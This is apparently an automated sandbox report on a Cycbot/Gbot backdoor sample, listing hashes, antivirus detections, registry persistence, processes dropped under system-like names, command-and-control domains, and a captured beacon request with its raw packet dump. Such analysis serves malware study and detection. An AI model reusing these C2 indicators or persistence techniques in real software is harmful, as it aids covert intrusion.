Analysis Date2015-01-17 13:55:40
MD5837e37064c3cdda422c45810a9b648e8
SHA13a4a6b1bb25b7238bf461d7ab10eab0ece4161c8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 6197253569000ef2636a058b04f92a91 sha1: 9bd07cd81433eb4fd6432e4c6ce1ea9a95d6f994 size: 105984
Section.rdata md5: a68ff4ef97fa171610bacfe645ed46ef sha1: 6345056c5528e4bd9802148e37b873787b4db7b2 size: 1024
Section.data md5: d2d39712c202fbbc1cddb46b26287fa2 sha1: a4d81f547d43e24e8167ef6cb17180e0cab39456 size: 70144
Section.reloc md5: 7d912832ef802578a3f4307d48f21806 sha1: ef8611956ed222a0de59479ac3097173fe616547 size: 1024
Timestamp2005-11-26 07:59:00
PEhash3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhash06a9d0c73a32942ddb8292199f42057a
AV360 Safeno_virus
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Heur.Conjar.5
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Heur.Conjar.5
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1367
AVDr. WebBackDoor.Gbot.73 - infected, incurable
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Kryptik.TFW
AVFortinetW32/Kryptik.SMY!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.n
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVRisingBackdoor.Win32.Cycbot.a
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen.2
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSjapanesegreenteaonline.com
Winsock DNSyourblogresources.com
Winsock DNScoolmediastore.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNSjapanesegreenteaonline.com
Type: A
66.117.0.221
DNSonlinesearchdb.com
Type: A
DNSyourblogresources.com
Type: A
DNScoolmediastore.com
Type: A
HTTP GEThttp://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif?v21=5&tq=gJ4WK%2FSUh6zGkkR8oY%2BQrMWTUj26kJHjyZJSPbqVyaBqtUn5CGFYVw%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 66.117.0.221:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   322e6769 663f7632 313d3526 74713d67   2.gif?v21=5&tq=g
0x00000030 (00048)   4a34574b 25324653 5568367a 476b6b52   J4WK%2FSUh6zGkkR
0x00000040 (00064)   386f5925 32425172 4d575455 6a32366b   8oY%2BQrMWTUj26k
0x00000050 (00080)   4a486a79 5a4a5350 62715679 61427174   JHjyZJSPbqVyaBqt
0x00000060 (00096)   556e3543 47465956 77253344 25334420   Un5CGFYVw%3D%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a206a 6170616e 65736567 7265656e   t: japanesegreen
0x000000a0 (00160)   7465616f 6e6c696e 652e636f 6d0d0a41   teaonline.com..A
0x000000b0 (00176)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000c0 (00192)   2d416765 6e743a20 6d6f7a69 6c6c612f   -Agent: mozilla/
0x000000d0 (00208)   322e300d 0a0d0a                       2.0....


Strings
.
@.
....
a../
.F
@y@@
.

080904b0
1.0.0.1
1735
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
^^^^^}}}}}}}}}}}}}}
<<<<<<<<<<<<<<<<<
==~~~~~
======================
__________
---------
--------*****
,,,,,,,
::::::::::
???????
......
........
...........
"`@~<}
"""""""
"""""""""
((((((((((((((((((
]]::::::::::
}}}}}}
}}}}}}}}
}}}}}}}}}
@-$`@~
$$$$$$$$$
**************
&&&&&&&&&
#######
%%%%%%%%%%
+?	\+ 
++++++++
++++++++++++
			||||
			////////
									
0000000]]]]
^^^^^^^^^^^^000000000000000
000dddd
07K( @~
 0^d1V
"``0_h
0!pWB:
11_0iFF|`?
1m`^+0,
1r8L^}
,` 1ri
]2]6In
. `;27
2888888wwwwwww
?\!2pYYp
-2SNu$`
31Qqqnz
333WWW
3.a8mU
}3*jng
.3-[)m<
3Mp{+p
3~. `n=
}3n n@
4;]`3f
((((((444444444
4F?8oz
4i+D1(
[]4>K;A
5555>>>>>>
55555555&&&&#
5e"OLl
;5F)Cj
5._H5&
=5(KJo
5oN<1K
5}Sydd
5tzAqp_dz
5*yr"|
6     
613h+_
,@6_3T
66666666
666666666
66666SS008
^{6FVv
6iK'!v3<
6{vXES=
@@6w( @
71C#d4:?
:76~LV"
774K#3%
777777
8<b{m"
,8GFe3
8gHcPVZ
8 NS)!
@8`TM+
 `8TZv
999======
99999999999999999
:9Ao#61
{9jf%|
 `9Klt
9.>R9/
@A=0|-
A0g\:3q,
AAAAAA
aaaaaaaaaaaaaa
A"aZJ}R#
AcaeXO
Ahsa41
.;ANsO
as)>;S
/aW^v~
A/zonn
B0K?B)
ba8+n&
BBBBBBB
bbbbbbbbbbb
BBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
` b-G:
@"`@~b;mZ
^boG><
b\;RA:
Bt&PFWN
BuHZu|
;bY/IY
CCCCCCChhh
CEGl2N4
 cigBZ
ClipCursor
Co8, `
_%>c^p
CRcU/x
CreatePopupMenu
CrUUUUUU
c> `@w
Cz6]fq
@.data
DDDDDD
dddddddAAAAAA
DDDDDDDDyyyyy
DDDDDDttttttttQQQQQ
dd^^++++++++gggg
dd+|w2
DestroyMenu
]\D`j{
	@Dj|r
>D;"#O
.dOY{	U
d{QX!-)%
dTK=)5
+Du.`@
DuplicateHandle
Du &,y
DveM!( 
DwR"+taTL
!DyH|%
` e*  
E	0VRk
ea1w#c
__EEEEEE
eFe||+(
. `EI[
EnumResourceNamesW
eq_cKB
=Ez@'.
ffffff
`F[G  `
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
#f&` M
fU0h.j'
FW5,`@
,  Fx"
` FYOX
f(zU*F
;G1pdp
Gb?< `
g:EENa
GetDesktopWindow
GetModuleFileNameW
G -fdi
##GGG@@@@
gggggg
gJ-yZm
gl5?v`
GN1v	-
/GPHSp
GPPKrk
GQi4	'
g`r+n=
G{U`%B
GYHi)U
{GY$)q
H$@` `
H:D>2J
 HfTY9AQ
HFV, `
HGvuO?
Hn=:==
:hvGuN
Hz{[6n
"`@i4c
i	5\HU.\
`@I7v1
iCNc-e
IFeM1e
-IFT>JM
[[[[[II9
IIIIIIII
iiiiiiiii
IIIIIIIIIIIIIIII
IIIIIIIxxx
IIIwwwwww
IkT@szxo
:@IlA)
`@%i\NaSe
i]nCfZ
[Ix^2u
*` j0^
J=3Dz+^6h
j3	t>T
 @})J4J
?jC9cA
JJ"""""""
JJJJJJ
JJJJJJ:::::::
jjjjjjjjj________
!jL*y&[
jNUzvPID
JTu)5!k
----------K
k ;(1s
K(  4Wy?
KERNEL32.dll
kITOpn1rNf
KKKKKKK
kkkkkkkk
kkkt(((((
Kl)y~o
@K?Ml;
kppppppppll;
K}R<<}
?K;Z7I"
@ l$@ 
*` 	l/
l\b) @
Lddddddd
 `"  LE
ljMy'69=$
L<}k9f=B
lkXx4Sm
(((((((lllllll
`@L[nw
	LQ64d.
:L_Tkaj7iq
lv8My!H
@`+LVC
>\>m{%
!,M?\?
MapViewOfFile
`mG7<.
MIlb>|
+ml~ 0
mm_<kW
mmmmmmmm
MMMMMMMMMMMM
MMMMYYY8777777777777777
 mNG'_P;]
 n{#@;
NdrComplexArrayFree
'nG%vt
nkds<y7lU
;NkK$` A<
nnnnnnnn
nnnnnnnnn
NNNNNNNNN
nnnnnnnnnnn'
NNNNNNNNNNN
}}}}}}}}}nnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNNNNYYY@@@zz
nP>2kr
nRRRRRRR
nt.8qY
NX^x{!M
/o6[gc
oDt|.`
~ok8%S
OOOO__
OOOOOOOOOOOO
ooooooooooooo
OPU#-K
O<V,` 
?Ov>6O
*`@ozva
"` p& 
p:::::::
pa8[]X3
>\pDNr<zF
P!dWq.
p^e. `
p}F>^*
p-G_|	
/P;-ghl
=Ph$<8(?7
pjS]v_
@Po>Wj
|||||||PP
::::PPPPPP
PPPPPPPPP
PPPPPPPPPPP
PPPPPPPPPPPPPPP
+p=Vam
``p~yT
=^_\Q|
?  @Q49
q4IP}?
	Q^9]0n
Q@iog$
Q%N~&7
Qnlf;<
?_qOb	l*89
qqbbbbb
.q\Qf&:
,,,,,,QQQQQQQQ
]q^U\Z
qVp<Kx
r~~~~~
@ R2h+
@r2K@R={
|r8.H'y
`rb( @
RB}n  `
`.rdata
RedrawWindow
.reloc
~r{hso
 @~R!k 
RPCRT4.dll
r"`@RG=
rrr99999999999
rrrrrr
RRRRRRRRRRR))
RRRRVVVVVVVV
RS*@`{
 `rsL,
RtA[(`@|
@ R$` w9
rwETbj
rW	Y9|^
Sbbbbbbb
?Sd5yltO
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
@S![Mq6
sssssAAAA
/	S%vu
;s?Y|)
}s[Yy5NA
TD0x%a
!This program cannot be run in DOS mode.
timeEndPeriod
tnnnnnnn8888
TQ?iA]
TrackPopupMenuEx
TS[C(a
TT					
/&tUPW
%\U6	.
u"%eX_
`@U;fK
+uMAvU
UnmapViewOfFile
u-P4w0
USER32
/u~tQHfk
UuidCreate
UUUUUUUUUUUUUUUUUUUUU
uuuuuZJJJJJJJJJJJJJ
Ux^Ss<
ux)$zI
u[YyD]
/v5ErH
#V_6Ky
\V/f8?)
^VJMagG3
VJR-E>
vml"``
`/|vMlD&
Vtx'0)
 \W(_1
$wBO/7
 wHhh8
WINMM.dll
wl?tI/n8(
W@N_P!
W>NW& 
w`Q!T>
W(S~!^p>(c:
wwEEEO
wwwwwwwww
wwwwwwwwwwwwww
 wwwwwwwwwwwwwwww
@ X;0r 
Xf; @ U
]XG8C%
	\<Xl7
X))))mmmmmmmmmmmmmm
>XSxpFIp
<<XX+++
******XXXXXXXXgggggggg######
XXXXXXXXXX
 @Y2o4
`@Y3>o
``'Y8n
#Y9^`C.
@ `}yA
>yg3IU
y[Md)7Ut"
^;Y!n1x
y(qb;v
 `@Y*``T
yUUUUUUH
]Yx[5_F
yYGL~k
YYYYYYYYYYYYY
.yZ{Zz
]Z7OQ`
]Zbh79
z_eWE7
Zfiimo%
ZGf#T	1S
zjtYK*
<%Z'Mc
zYTtkUM